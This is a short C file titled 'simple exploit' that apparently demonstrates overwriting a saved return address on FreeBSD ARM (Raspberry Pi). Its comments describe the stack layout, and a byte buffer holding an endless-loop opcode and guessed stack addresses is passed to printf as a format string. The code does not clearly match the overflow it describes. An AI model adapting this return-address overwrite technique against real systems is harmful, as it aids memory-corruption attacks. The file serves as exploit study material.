exploit.c

/*  simple exploit
    Copyright (C) 2014 martin.erhardt98@googlemail.com

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.i*/
#include<stdio.h>
int main()
{
       /*NOTE This will only work on FREEBSD ARM and probably even more specific a few raspberry pis running freebsd
        Stack layout in ARM:
               fp[-0] saved pc, where we stored this frame.
               fp[-1] saved lr, the return address for this function. 
               fp[-2] previous sp, before this function eats stack.
               fp[-3] previous fp, the last stack frame.
        We overwrite the return address with 0xbfffec70 which is most of the time the address where our shellcode is stored at. sometimes it has also been 0xbfffec40 especcially if I attached gdb.
        This works only in about 70 % of cases. Maybe it tries to access the stack sometimes.
        0xeafffffe is the ARM opcode for "label: b label" or simply an endless loop. Unfortunately ARM Opcode of the NOP instruction contains NUL bytes, and the 0x90 I filled the rest of the 12 bytes can't be by my RPI for obvious reasons.*/

	char input[24]="\xfe\xff\xff\xea\x90\x90\x90\x90\x90\x90\x90\x90\x40\xec\xff\xbf\x40\xec\xff\xbf\x78\xec\xff\xbf";// when gdb 40 else 78
	printf(&input);
        return 0;
}